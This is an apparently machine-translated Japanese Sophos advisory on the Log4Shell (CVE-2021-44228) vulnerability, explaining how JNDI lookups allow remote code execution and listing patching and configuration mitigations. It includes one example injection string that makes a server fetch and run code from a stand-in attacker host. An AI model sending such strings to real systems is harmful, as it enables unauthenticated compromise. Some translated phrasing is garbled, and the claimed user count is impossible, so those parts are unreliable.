Java 脆弱性 Log4j - Log4Shell - 何が起きて、今何をすべきか。 Hafnium、Kaseya、または Solarwinds の後、企業は再び Log4j - Log4Shell と呼ばれる注目を集めたサーバーの脆弱性に緊急に対処する必要があります。 ソフォスは、最も重要な事実を明らかにし、何をすべきかを教えてくれます。
Log4Shell という名前は、悪用されている欠陥が Log4j (Logging for Java) と呼ばれる一般的な Java コード ライブラリに含まれていること、および攻撃者が脆弱性の悪用に成功した場合、実質的にシェル (任意のシステム コードを実行する機会) を取得するという事実を指しています。あなたの選択の。
「Log4Shell 攻撃の重要なポイントは、サーバーが自動的にコードを実行することです。 攻撃者が脆弱性を持つサーバーに対して実行したいことは何でも実行できます。 そのため、できるだけ早くパッチを適用することが非常に重要です。なぜなら、何の役にも立たない多くの人々が、どのサーバーがまだ脆弱であるかをすでにテストしようとしているからです。」
ソフォスの IT セキュリティ エキスパート、Paul Ducklin 氏
そして、そのコマンドだけでは不十分であるかのように、脆弱性はゼロデイ脆弱性としてツイートされました。これは、パッチが利用可能になる前に文書化されるセキュリティ上の欠陥です. また、概念実証 (PoC) が GitHub で公開され、パッチが適用されていない間に問題が世界中に知られるようになりました。 警報ベルは金曜日以来、世界中で大声で鳴り響いており、例えばドイツでも同様です。 BSIは赤の警告レベルを宣言しました.
不適切な入力検証
現在正式に CVE-2021-44228 として知られている脆弱性は、無害なリクエストが脆弱なサーバーに送信されたときに発生しました。このリクエストには、サイバー犯罪者がサーバーに書き込むことを期待する (または知っている) HTTP ヘッダーなどのデータが含まれていました。そのログファイル。 この方法で挿入されたデータは、隠された「ブービー トラップ」を形成します。サーバーがデータをログに適した形式に変換する間、必要なログ エントリを作成するための不可欠な部分として Web ダウンロードを開始するためです。 また、返されるデータが有効な Java プログラム (専門用語では .class ファイル) である場合、サーバーはそのファイルを実行してログ データの生成を支援するため、このアクションは困難です。
パッチが適用されていない Log4j ライブラリにより、ログ要件が許可されます
問題は、Log4j ライブラリのパッチが適用されていないバージョンでは、デフォルトでロギング リクエストが一般的な LDAP (ディレクトリ サービス) 検索やその他のさまざまなオンライン検索をトリガーできるようになっていることです。 この「機能」は、OZZJ5JYPVK のようなユーザー ID などのあまり役に立たないデータを、Peter Miller のようなネットワーク上で意味のある人間が読める情報に変換するのに役立ちます。 これらの要求は、Java Naming and Directory Interface の略である JNDI と呼ばれる一般的に使用される Java ツールキットを介して行われます。
このアプローチは、サーバー側のコード実行をトリガーできるログ データが、独自のネットワーク上のディレクトリ サーバーに制限されている限り実行可能です。 ただし、多くのサーバーは適切に設定されていないため、悪意のある「ログスプロイター」は、企業がログに記録して自動的にサーバーに送信することを期待しているデータに、{$jndi:ldap://dodgy.example:389/badcode} のようなテキストを埋め込もうとする可能性があります。
- JNDI を使用して、指定された信頼できない外部サーバーの指定されたポート (この例では 389) に LDAP 要求を送信します。
- ロケーションbadcodeで信頼できないコンテンツを取得します。
- 攻撃者が提供したコードを実行して、ロギングの「ヘルプ」を取得します。
簡単に言うと、この行為は技術用語で認証されていないリモート コード実行 (RCE) として知られています。 ログインしたり、パスワードやアクセス トークンを要求したりしなくても、サイバー犯罪者は無害に見えるリクエストを使用して、サーバーをだましてレポートを作成させたり、コードをダウンロードさせたりして、マルウェアに感染させることができます。 サーバーが内部ネットワークに対して持っているアクセス権に応じて、このような RCE は、サイバー犯罪者がさまざまな悪意のあるタスクを実行するのに役立ちます。
それこそが、現在のチェス ポイント Log4Shell を非常に危険なものにしている理由です。 理論的には、攻撃者はサーバー自体からデータを流出させることができます。 内部ネットワークの詳細を調べ、サーバー上のデータを変更します。 ネットワーク内の他のサーバーからデータを盗み出す。 将来の攻撃に備えてサーバーまたはネットワークに追加のバックドアを設定するか、ネットワーク スヌーパー、メモリ スクレーパー、データ スティーラー、クリプトマイナーなどの追加のマルウェアをインストールします。
今何をする!
ライセンサー Apache は、このトピックに関する実用的なセキュリティ アドバイザリを公開しました。. ソフォスは、最も重要なことを再度まとめています。
- Apache Log4j 2.15.0 にアップグレードします。 Log4j を使用している場合、2 以前の 2.14.1.x バージョンはデフォルトで脆弱なようです。 (Log4j 1.x をまだ使用している場合は、更新プログラムが提供されなくなったため、アップグレードも必須です)。
- JNDI が信頼できないサーバーにリクエストを送信する可能性をブロックします。 更新できないが、Log4j 2.10.0 以降を使用している場合は、log4j2.formatMsgNoLookups 構成値を true に設定できます。これにより、発信 LDAP および同様のルックアップが最初から防止されます。
- 使用されている Java ランタイムを確認しています。 使用している基盤となる Java ビルドでは、独自のデフォルト構成に基づいてこのエラーがスローされない場合があります。 たとえば、Apache は、この RCE に対する保護として Oracle Java 8u121 を明示的にリストしています。
この脆弱性は個人ユーザーにも影響しますか?
Log4Shell は企業にとって危険信号を意味するだけでなく、個人ユーザーもギャップの影響を受ける可能性があります。 これは、ブログ、フォーラム、家族の Web サイトなど、ホスティング会社やその他のマネージド サービス プロバイダーが運営するクラウド サーバーを個人が使用する場合に特に当てはまります。 ここで最初にすべきことは、これらのサービスに脆弱性があるかどうか、およびパッチがいつ計画されているかを調べることです。 現時点では、プロバイダーにはメールが殺到している可能性が高いため、関連する Web サイトで情報を探す方が確実に理にかなっています。
サービス プロバイダーからのメッセージに注意する
さらに、メールボックスで使用されているオンライン サービスからの公式のセキュリティ警告にも注意を払う必要がありますが、ここでも注意が必要です。 ユーザーが現在のセキュリティの脆弱性に関するメッセージを受け取った場合 (依然として著名なサービス プロバイダーから送信されている可能性があります)、アラートに記載されているリンクを自動的にクリックしたり、批判的な調査なしに電話番号をダイヤルしたりしないでください。 Log4Shell などのメディアに精通したサイバー攻撃は、フィッシング攻撃のためにユーザーの恐怖を利用したいただ乗りをすぐに誘発します。 疑わしい場合は、ユーザーは、以前に使用した URL、電子メール アドレス、または電話番号を使用して、独自の方法で情報を取得する必要があります。
詳細は Sophos.com をご覧ください
ソフォスについて ソフォスは、100 か国の 150 億人を超えるユーザーから信頼されています。 複雑な IT の脅威とデータ損失に対する最高の保護を提供します。 当社の包括的なセキュリティ ソリューションは、導入、使用、管理が簡単です。 業界で最も低い総所有コストを提供します。 ソフォスは、受賞歴のある暗号化ソリューション、エンドポイント、ネットワーク、モバイル デバイス、電子メール、および Web 向けのセキュリティ ソリューションを提供しています。 また、独自の分析センターのグローバル ネットワークである SophosLabs からのサポートもあります。 ソフォスの本社は、米国のボストンと英国のオックスフォードにあります。